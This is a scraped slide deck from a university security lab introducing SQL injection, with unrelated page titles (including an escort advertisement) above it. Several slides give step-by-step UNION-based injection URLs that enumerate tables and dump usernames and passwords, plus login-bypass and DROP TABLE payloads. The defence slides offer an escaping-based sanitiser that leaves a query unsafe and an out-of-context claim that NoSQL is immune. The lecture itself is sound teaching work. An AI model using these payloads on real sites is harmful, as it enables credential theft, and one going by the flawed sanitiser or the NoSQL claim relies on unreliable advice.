The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 

A Brief Introduction in SQL Injection

  • 1. Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
  • 2. • Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
  • 3. We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
  • 4.
  • 5.  SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
  • 6.  Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
  • 7.  www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
  • 8.  The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
  • 9.  Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
  • 10.  Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
  • 11.  And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
  • 12.  Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
  • 13. If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
  • 14. Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
  • 15.  How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
  • 16.  Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
  • 17. • Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
  • 18. <?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
  • 19. Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
  • 20.  Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
  • 21.  I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
  • 22. NoSQL databases are immune to SQL injection.

Editor's Notes

  1. Tables have relation with each other . Inserting the row in tables with unauthorized access